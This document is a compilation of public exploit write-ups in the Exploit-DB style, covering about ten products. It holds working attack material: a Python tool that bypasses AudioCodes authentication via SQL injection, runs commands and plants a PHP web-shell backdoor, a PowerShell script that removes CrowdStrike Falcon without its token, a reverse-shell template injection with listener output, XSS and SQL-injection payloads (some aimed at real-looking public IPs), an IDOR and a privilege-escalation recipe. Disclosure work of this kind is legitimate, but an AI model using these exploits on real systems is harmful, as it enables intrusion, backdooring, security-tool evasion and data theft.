## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection ## Author: nu11secur1ty ## Date: 11.28.2022 ## Vendor: https://www.concretecms.org/ ## Software: https://www.concretecms.org/download ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3 ## Description: The URL path folder `3` appears to be vulnerable to XPath injection attacks. The test payload 50539478' or 4591=4591-- was submitted in the URL path folder `3`, and an XPath error message was returned. The attacker can flood with requests the system by using this vulnerability to untilted he receives the actual paths of the all content of this system which content is stored on some internal or external server. ## STATUS: HIGH Vulnerability [+] Exploits: 00: ```GET GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` [+] Response: ```HTTP HTTP/1.1 500 Internal Server Error Date: Mon, 28 Nov 2022 15:32:22 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 592153 <!DOCTYPE html><!-- Whoops\Exception\ErrorException: include(): Failed opening &#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php&#039; for inclusion (include_path=&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR&#039;) in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php on line 26 Stack trace: 1. Whoops\Exception\ErrorException->() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26 2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26 3. Stash\Driver\FileSystem\NativeEncoder->deserialize() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201 4. Stash\Driver\FileSystem->getData() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631 5. Stash\Item->getRecord() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321 6. Stash\Item->executeGet() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252 7. Stash\Item->get() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346 8. Stash\Item->isMiss() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67 9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356 10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601 11. Laminas\I18n\Translator\Translator->loadMessages() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434 12. Laminas\I18n\Translator\Translator->getTranslatedMessage() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349 13. Laminas\I18n\Translator\Translator->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69 14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27 15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47 16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267 17. Concrete\Core\Block\View\BlockView->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164 18. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853 19. Concrete\Core\Area\Area->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128 20. Concrete\Core\Area\GlobalArea->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11 21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125 22. Concrete\Core\View\View->inc() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4 23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329 24. Concrete\Core\View\View->renderTemplate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291 25. Concrete\Core\View\View->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164 26. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19 27. Concrete\Controller\SinglePage\PageNotFound->view() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318 28. call_user_func_array() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318 29. Concrete\Core\Controller\AbstractController->runAction() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188 30. Concrete\Core\Http\ResponseFactory->controller() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95 31. Concrete\Core\Http\ResponseFactory->notFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390 32. Concrete\Core\Http\ResponseFactory->collectionNotFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234 33. Concrete\Core\Http\ResponseFactory->collection() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132 34. Concrete\Core\Http\DefaultDispatcher->handleDispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60 35. Concrete\Core\Http\DefaultDispatcher->dispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39 36. Concrete\Core\Http\Middleware\DispatcherDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39 37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36 39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36 41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35 43. Concrete\Core\Http\Middleware\CookieMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29 45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86 47. Concrete\Core\Http\Middleware\MiddlewareStack->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85 48. Concrete\Core\Http\DefaultServer->handleRequest() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125 49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102 50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45 51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2 --><html> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <title>Concrete CMS has encountered an issue.</title> <style>body { font: 12px "Helvetica Neue", helvetica, arial, sans-serif; color: #131313; background: #eeeeee; padding:0; margin: 0; max-height: 100%; text-rendering: optimizeLegibility; } a { text-decoration: none; } .Whoops.container { position: relative; z-index: 9999999999; } .panel { overflow-y: scroll; height: 100%; position: fixed; margin: 0; left: 0; top: 0; } .branding { position: absolute; top: 10px; right: 20px; color: #777777; font-size: 10px; z-index: 100; } .branding a { color: #e95353; } header { color: white; box-sizing: border-box; background-color: #2a2a2a; padding: 35px 40px; max-height: 180px; overflow: hidden; transition: 0.5s; } header.header-expand { max-height: 1000px; } .exc-title { margin: 0; color: #bebebe; font-size: 14px; } .exc-title-primary, .exc-title-secondary { color: #e95353; } .exc-message { font-size: 20px; word-wrap: break-word; margin: 4px 0 0 0; color: white; } .exc-message span { display: block; } .exc-message-empty-notice { color: #a29d9d; font-weight: 300; } ....... ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3) ## Proof and Exploit: [href](https://streamable.com/4f60ka) ## Time spent `03:00:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE) # Date: 02-12-22 # Exploit Author: 0xEF # Vendor Homepage: https://www.audiocodes.com # Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637 # Version: <= 7.8.20002.47752 # Tested on: Windows 10 & Windows Server 2019 # Default credentials: admin/admin # SQL injection + Path traversal + Remote Command Execution # CVE: CVE-2022-24627, CVE-2022-24629, CVE-2022-24630, CVE-2022-24632 #!/usr/bin/python3 import requests import sys import time import re import colorama from colorama import Fore, Style import uuid headers = {'Content-Type': 'application/x-www-form-urlencoded'} def menu(): print('-----------------------------------------------------------------------\n' 'AudioCodes Device Manager Express 45 78 70 6C 6F 69 74 \n' '-----------------------------------------------------------------------') def optionlist(s,target): try: print('\nOptions: (Press any other key to quit)\n' '-----------------------------------------------------------------------\n' '1: Upload arbitrary file\n' '2: Download arbitrary file\n' '3: Execute command\n' '4: Add backdoor\n' '-----------------------------------------------------------------------') option = int(input('Select: ')) if(option == 1): t = 'a' upload_file(s,target,t) elif(option == 2): download_file(s,target) elif(option == 3): execute(s,target) elif(option == 4): t = 'b' upload_file(s,target,t) except: sys.exit() def bypass_auth(target): try: print(f'\nTrying to bypass authentication..\n') url = f'http://{target}/admin/AudioCodes_files/process_login.php' s = requests.Session() # CVE-2022-24627 payload_list = ['\'or 1=1#','\\\'or 1=1#','admin'] for payload in payload_list: body = {'username':'admin','password':'','domain':'','p':payload} r = s.post(url, data = body) if('Configuration' in r.text): print(f'{Fore.GREEN}(+) Authenticated as Administrator on: {target}{Style.RESET_ALL}') time.sleep(1) return(s) else: print(f'{Fore.RED}(-) Computer says no, can\'t login, try again..{Style.RESET_ALL}') main() except: sys.exit() def upload_file(s,target,t): try: url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?type=' param = uuid.uuid4().hex file = input('\nEnter file name: ') # read extension ext = file.rsplit( ".", 1 )[ 1 ] if (t=='b'): # remove extension file = file.rsplit( ".", 1 )[ 0 ] + '.php' ext = 'php' patch = '1' if(file != ''): if(patch_ext(s,target,patch,ext)): # CVE-2022-24629 print(f'{Fore.GREEN}(+) Success{Style.RESET_ALL}') if(t=='a'): dest = input('\nEnter destination location (ex. c:\): ') print(f'\nUploading file to {target}: {dest}{file}') files = {'myfile': (file, open(file,'rb'), 'text/html')} body = {'dir': f'{dest}', 'type': '', 'Submit': 'Upload'} r = s.post(url, files=files, data=body) print(f'{Fore.GREEN}(+) Done{Style.RESET_ALL}') if(t=='b'): shell = f'<?php echo shell_exec($_GET[\'{param}\']); ?>' files = {f'myfile': (file, shell, 'text/html')} body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'} r = s.post(url, files=files, data=body) print(f'\nBackdoor location:') print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}') patch = '2' time.sleep(1) patch_ext(s,target,patch,ext) else: print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}') except: print(f'{Fore.RED}(-) Computer says no..{Style.RESET_ALL}') patch = '2' patch_ext(s,target,patch,ext) def download_file(s,target): # CVE-2022-24632 try: file = input('\nFull path to file, eg. c:\\windows\win.ini: ') if(file != ''): url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?view={file}' r = s.get(url) if (len(r.content) > 0): print(f'{Fore.GREEN}\n(+) File {file} downloaded\n{Style.RESET_ALL}') file = str(file).split('\\')[-1:][0] open(file, 'wb').write(r.content) else: print(f'{Fore.RED}\n(-) File not found..\n{Style.RESET_ALL}') else: print(f'{Fore.RED}\n(-) Computer says no..\n{Style.RESET_ALL}') except: sys.exit() def execute(s,target): try: while True: # CVE-2022-24631 command = input('\nEnter a command: ') if(command == ''): optionlist(s,target) break print(f'{Fore.GREEN}(+) Executing: {command}{Style.RESET_ALL}') body = 'ssh_command='+ command url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?cmd=ssh' r = s.post(url, data = body, headers=headers) print('-----------------------------------------------------------------------') time.sleep(1) print((", ".join(re.findall(r'</form>(.+?)</section>',str(r.content)))).replace('\\r\\n', '').replace('</div>', '').replace('<div>', '').replace('</DIV>', '').replace('<DIV>', '').replace('<br/>', '').lstrip()) print('-----------------------------------------------------------------------') except: sys.exit() def patch_ext(s,target,opt,ext): try: if(opt == '1'): print('\nTrying to add extension to whitelist..') body = {'action':'saveext','extensions':f'.cab,.cfg,.csv,.id,.img,.{ext},.zip'} if(opt == '2'): print('\nCleaning up..') body = {'action':'saveext','extensions':'.cab,.cfg,.csv,.id,.img,.zip'} print(f'{Fore.GREEN}(+) {ext.upper()} extension removed\n{Style.RESET_ALL}') url = f'http://{target}/admin/AudioCodes_files/ajax/ajaxGlobalSettings.php' r = s.post(url, data = body, headers=headers) time.sleep(1) if(f'{ext}' in r.text): return True except: sys.exit() def main(): if len(sys.argv) != 2: print(' Usage: ' + sys.argv[0] + ' <target IP>') print(' Example: ' + sys.argv[0] + ' 172.16.86.154') sys.exit(1) target = sys.argv[1] menu() s = bypass_auth(target) if(s): optionlist(s,target) if __name__ == '__main__': main() # Timeline # 11-11-2021 Vulnerabilities discovered # 12-11-2021 PoC written # 15-11-2021 Details shared with vendor # 02-12-2021 Vendor confirmed vulnerabilities # 03-12-2021 CVE's requested # 09-12-2021 Vendor replied with solution and notified customers # 07-02-2022 Product EOL announced # 10-03-2022 CVE's assigned # 02-12-2022 Disclosure of findings

# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token # Date: 30/11/2022 # Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) # Vendor Homepage: https://www.crowdstrike.com/ # Author Homepage: https://www.deda.cloud/ # Tested On: All Windows versions # Version: 6.44.15806 # CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. $InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall" foreach($obj in $InstalledSoftware){ if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName')) { $uninstall_uuid = $obj.Name.Split("\")[6] } } $g_msiexec_instances = New-Object System.Collections.ArrayList Write-Host "[+] Identified installed Falcon: $uninstall_uuid" Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ." Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid" while($true) { if (get-process -Name "CSFalconService") { Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object { if (-Not $g_msiexec_instances.contains($_.id)){ $g_msiexec_instances.Add($_.id) if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){ Start-Sleep -Milliseconds 100 Write-Host "[+] Killing PID " + $g_msiexec_instances[-1] stop-process -Force -Id $g_msiexec_instances[-1] } } } } else { Write-Host "[+] CSFalconService process vanished...reboot and have fun!" break } }

# Exploit Title: 4images 1.9 - Remote Command Execution (RCE) # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.9 # Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d= efault_960px" -> "Load Theme" 3. Select Template "categories.html" 4. Paste reverse shell code 5. Click "Save Changes" 6. Browse to "http://host/4images/categories.php?cat_id=3D1" // HTTP POST request showing reverse shell payload POST /4images/admin/templates.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= 101 Firefox/100.0 [...] __csrf=3Dc39b7dea0ff15442681362d2a583c7a9&action=3Dsavetemplate&content=3D[= REVERSE_SHELL_CODE]&template_file_name=3Dcategories.html&template_folder=3D= default_960px[...] // HTTP redirect response to specific template GET /4images/categories.php?cat_id=3D1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= 101 Firefox/100.0 [...] # nc -kvlp 4444 listening on [any] 4444 ... connect to [127.0.0.1] from localhost [127.0.0.1] 43032 Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (20= 22-11-07) x86_64 GNU/Linux 13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT kali tty7 :0 11:58 2:18m 2:21 0.48s xfce4-sessi= on kali pts/1 - 11:58 1:40 24.60s 0.14s sudo su uid=3D1(daemon) gid=3D1(daemon) groups=3D1(daemon) /bin/sh: 0: can't access tty; job control turned off $=20 --sgnirk-7d26becc-c589-46c6-a348-fe09d4b162fe--

# Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting (XSS) # Google Dork: inurl:/scripts/wa.exe # Date: 12/01/2022 # Exploit Author: Shaunt Der-Grigorian # Vendor Homepage: https://www.lsoft.com/ # Software Link: https://www.lsoft.com/download/listserv.asp # Version: 17 # Tested on: Windows Server 2019 # CVE : CVE-2022-39195 A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter. To reproduce, please visit http://localhost/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E (or whichever URL you can use for testing instead of localhost). The "c" parameter will reflect any value given onto the page. # Solution This vulnerability can be mitigated by going under "Server Administration" to "Web Templates" and editing the BODY-LCMD-MESSAGE web template. Change &+CMD; to &+HTMLENCODE(&+CMD;); .

# Exploit Title: LISTSERV 17 - Insecure Direct Object Reference (IDOR) # Google Dork: inurl:/scripts/wa.exe # Date: 12/02/2022 # Exploit Author: Shaunt Der-Grigorian # Vendor Homepage: https://www.lsoft.com/ # Software Link: https://www.lsoft.com/download/listserv.asp # Version: 17 # Tested on: Windows Server 2019 # CVE : CVE-2022-40319 # Steps to replicate 1. Create two accounts on your LISTSERV 17 installation, logging into each one in a different browser or container. 2. Intercept your attacking profile's browser traffic using Burp. 3. When logging in, you'll be taken to a URL with your email address in the Y parameter (i.e. http://example.com/scripts/wa.exe?INDEX&X=[session-id]&Y=[email-address]). 4. Click on your email address on the top right and select "Edit profile". 5. In Burp, change the email address in the URL's Y parameter to the email address of your victim account. 4. Next, the "WALOGIN" cookie value will be an ASCII encoded version of your email address. Using Burp Decoder, ASCII encode your victim's email address and replace the "WALOGIN" cookie value with that.5. Submit this request. You should now be accessing/editing the victim's profile. You can make modifications and access any information in this profile as long as you replace those two values in Burp for each request.

# Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS) # Date: 2022-12-05 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/wpforms-lite # Version: 1.7.8 # Tested on: Windows 10 # CVE: N/A 1. Description: This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>

# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) # Exploit Author: Andrey Stoykov # Software Link: https://github.com/Shoplazza/LifeStyle # Version: 1.1 # Tested on: Ubuntu 20.04 Stored XSS #1: To reproduce do the following: 1. Login as normal user account 2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post" 3. Select "Title" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1= .1 Host: test1205.myshoplaza.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= 101 Firefox/100.0 [...] {"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><s= cript>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","c= ontent":"<p>\"><script>alert(3)</script></p>"[...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: application/json; charset=3Dutf-8 [...] {"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\= "><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>= alert(1)</script>"[...] // HTTP GET request to trigger XSS payload GET /blog/titlescriptalert1script?st=3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9= .eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC= 03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUK= Enfj9L49I HTTP/1.1 Host: test1205.myshoplaza.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= 101 Firefox/100.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: text/html; charset=3DUTF-8 [...] <meta name=3D"viewport" content=3D"width=3Ddevice-width,initial-scale=3D1,m= inimum-scale=3D1,maximum-scale=3D1,user-scalable=3Dno,viewport-fit=3Dcover"= > <title>Title"><script>alert(1)</script></title> <meta name=3D"keywords" content=3D"test1205"> [...] --rehcsed-054bdeb7-e1dc-47b8-a8d3-67ca7da532d2--

# Exploit Title: Zillya Total Security 3.0.2367.0 - Local Privilege Escalation # Date: 02.12.2022 # Author: M. Akil Gündoğan # Contact: https://twitter.com/akilgundogan # Vendor Homepage: https://zillya.com/ # Software Link: (https://download.zillya.com/ZTS3.exe) / (https://download.zillya.com/ZIS3.exe) # Version: IS (3.0.2367.0) / TS (3.0.2368.0) # Tested on: Windows 10 Professional x64 # PoC Video: https://youtu.be/vRCZR1kd89Q Vulnerabiliy Description: --------------------------------------- Zillya's processes run in SYSTEM privileges. The user with low privileges in the system can copy any file they want to any location by using the quarantine module in Zillya. This is an example of AVGater vulnerabilities that are often found in antivirus programs. You can read the article about AVGater vulnerabilities here: https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/ The vulnerability affects both "Zillya Total Security" and "Zillya Internet Security" products. Step by step produce: --------------------------------------- 1 - Attackers create new folder and into malicious file. It can be a DLL or any file. 2 - Attacker waits for "Zillya Total Security" or "Zillya Internet Security" to quarantine him. 3 - The created folder is linked with the Google Symbolic Link Tools "Create Mount Point" tools to the folder that the current user does not have write permission to. You can find these tools here: https://github.com/googleprojectzero/symboliclink-testing-tools 4 - Restores the quarantined file. When checked, it is seen that the file has been moved to an unauthorized location. This is evidence of escalation vulnerability. An attacker with an unauthorized user can write to directories that require authorization. Using techniques such as DLL hijacking, it can gain access to SYSTEM privileges. Advisories: --------------------------------------- Developers should not allow unauthorized users to restore from quarantine unless necessary. Also, it should be checked whether the target file has been copied to the original location. Unless necessary, users should not be able to interfere with processes running with SYSTEM privileges. All processes on the user's side should be run with normal privileges. Disclosure Timeline: --------------------------------------- 13.11.2022 - Vulnerability reported via email but no response was given and the fix was not released. 02.12.2022 - Full disclosure.

# Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) # Google Dork: N/A # Date: 12/6/2022 # Exploit Author: @casp3r0x0 hassan ali al-khafaji # Vendor Homepage: https://www.eve-ng.net/ # Software Link: https://www.eve-ng.net/index.php/download/ # Version: Free EVE Community Edition Version 5.0.1-13 # Tested on: Free EVE Community Edition Version 5.0.1-13 # CVE : N/A #we could achieve stored XSS on eve-ng free I don't know If this effect pro version also #first create a new lab #second create a Text label #insert the xss payload and click save "><script>alert(1)</script> #the application is multi user if any user open the lab the xss will be triggered.

Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection Date: 2022.12.7 Exploit Author: TLF Vendor Homepage: https://www.yiquantech.com/pc/about.html Software Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/ Version: EQ v1.5.31 to v2.2.0 Tested on: windows 10 CVE : CVE-2022-45297 POC: POST /Account/Login HTTP/1.1 Host: 121.8.146.131 User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 118 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg Origin: http://121.8.146.131 Referer: http://121.8.146.131/Account/Login X-Requested-With: XMLHttpRequest Accept-Encoding: gzip RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27

